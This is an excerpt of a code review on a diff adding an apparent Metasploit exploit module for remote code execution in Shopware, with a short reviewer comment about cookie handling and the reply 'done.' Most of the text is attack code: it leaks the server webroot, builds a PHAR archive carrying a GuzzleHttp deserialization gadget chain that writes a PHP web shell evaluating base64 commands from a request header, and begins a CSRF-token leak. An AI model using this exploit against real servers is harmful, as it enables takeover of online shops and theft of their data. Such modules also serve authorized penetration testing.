modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb

```diff
@@ -0,0 +1,262 @@
+      @webroot = $1 if res.body =~ /DOCUMENT_ROOT <\/td><td class=\"v\">(.*) <\/td><\/tr>/
+      return
+    end
+    fail_with(Failure::Unknown, "Unable to leak the webroot")
+  end
+
+  def generate_phar
+    @php = "#{@webroot}#{target_uri.path}media/#{@shll_bd}.php"
+    register_file_for_cleanup("#{@shll_bd}.php")
+    pop  = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"
+    pop << "s:#{@php.length}:\"#{@php}\";"
+    pop << "s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";"
+    pop << "a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";"
+    pop << "a:3:{s:5:\"Value\";"
+    pop << "s:48:\"<?php eval(base64_decode($_SERVER[HTTP_#{@header}])); ?>\";"
+    pop << "s:7:\"Expires\";"
+    pop << "b:1;"
+    pop << "s:7:\"Discard\";"
+    pop << "b:0;}}}}"
+    file          = Rex::Text.rand_text_alpha_lower(8)
+    stub          = "<?php __HALT_COMPILER(); ?>\r\n"
+    file_contents = Rex::Text.rand_text_alpha_lower(20)
+    file_crc32    = Zlib::crc32(file_contents) & 0xffffffff
+    manifest_len  = 40 + pop.length + file.length
+    @phar  = stub
+    @phar << [manifest_len].pack('V')              # length of manifest in bytes
+    @phar << [0x1].pack('V')                       # number of files in the phar
+    @phar << [0x11].pack('v')                      # api version of the phar manifest
+    @phar << [0x10000].pack('V')                   # global phar bitmapped flags
+    @phar << [0x0].pack('V')                       # length of phar alias
+    @phar << [pop.length].pack('V')                # length of phar metadata
+    @phar << pop                                   # pop chain
+    @phar << [file.length].pack('V')               # length of filename in the archive
+    @phar << file                                  # filename
+    @phar << [file_contents.length].pack('V')      # length of the uncompressed file contents
+    @phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.
+    @phar << [file_contents.length].pack('V')      # length of the compressed file contents
+    @phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents
+    @phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
+    @phar << [0x0].pack('V')                       # serialized File Meta-data length
+    @phar << file_contents                         # serialized File Meta-data
+    @phar << [Rex::Text.sha1(@phar)].pack('H*')    # signature
+    @phar << [0x2].pack('V')                       # signiture type
+    @phar << "GBMB"                                # signature presence
+    return
+  end
+
+  def leak_csrf
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
+      'headers' => {
+        'Cookie' => @cookie,
```

Comment:
`send_request_uri` supports `cookie` as a root level key. This is preferred over setting a cookie via the `headers` key.

Reply:
done.